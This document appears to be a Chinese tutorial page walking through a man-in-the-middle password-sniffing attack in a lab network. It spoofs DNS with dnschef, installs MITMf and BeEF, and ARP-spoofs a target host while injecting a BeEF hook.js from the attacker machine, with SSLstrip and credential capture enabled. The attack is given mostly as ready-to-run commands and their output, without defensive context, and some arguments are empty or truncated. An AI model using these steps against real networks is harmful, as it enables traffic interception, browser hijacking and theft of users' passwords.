700字范文 > 密码嗅探中间人攻击

密码嗅探中间人攻击

时间：2021-11-21 06:00:54

相关推荐

密码嗅探中间人攻击

密码嗅探

DNS欺骗代理

- dnschef --fakeip=1.1.1.10 --

fakedomains=, --interface 1.1.1.2

-q

将被害者DNS指向伪造的DNS服务器

root@k:~# dnschef --fakeip=192.168.1.1 --fakedomains=, --interface 192.168.1.110 -q

[+] DNSChef started on interface: 192.168.1.110

[+] Using the following nameservers: 8.8.8.8

[+] Cooking A replies to point to 192.168.1.1 matching:

[+] Cooking A replies to point to 192.168.1.1 matching: ,www,

root@k:~# netstat -pantu | grep :53

udp 0 0 192.168.1.110:53 0.0.0.0:* 2073/python

把win7的DNS地址改为: 192.168.1.110

wireshark Network Analyzer

host 192.168.1.111

root@k:~# apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libipeq-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file

root@k:~# apt-get install mitmf

root@k:~# pip uninstall twisted

root@k:~# wget /Release/Twisted/15.5/Twisted-15.5.0.tar.bz2

root@k:~# pip install ./Twisted-15.5.0.tar.bz2

root@k:~# mitmf

root@k:~# cd /usr/share/beef-xss/

root@k:/usr/share/beef-xss# ls

arerules beef beef_cert.pem beef_key.pem config.yaml core db extensions Gemfile Gemfile.lock modules

root@k:/usr/share/beef-xss# ./beef

root@k:/usr/share/beef-xss# openvas-stop

Stopping Openvas Services

root@k:/usr/share/beef-xss# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --inject --js-url http://192.168.1.110:3000/hook.js

[+] MITMF v0.9.8 - 'The Dark Side'

|_ Inject v0.4

|_ Spoof v0.6

| |_ ARP spoofing enabled

|_ Sergio-Proxy v0.2.1 online

|_ SSLstrip v0.9 by Moxie Marlinspike online

|_ Net-Creds v1.0 online

|_ MITMF-API online

* Running on http://127.0.0.1:9999/ (Press CTPL+C to quit)

|_ HTTP server online

|_ DNSChef v0.4 online

|_ SMB server online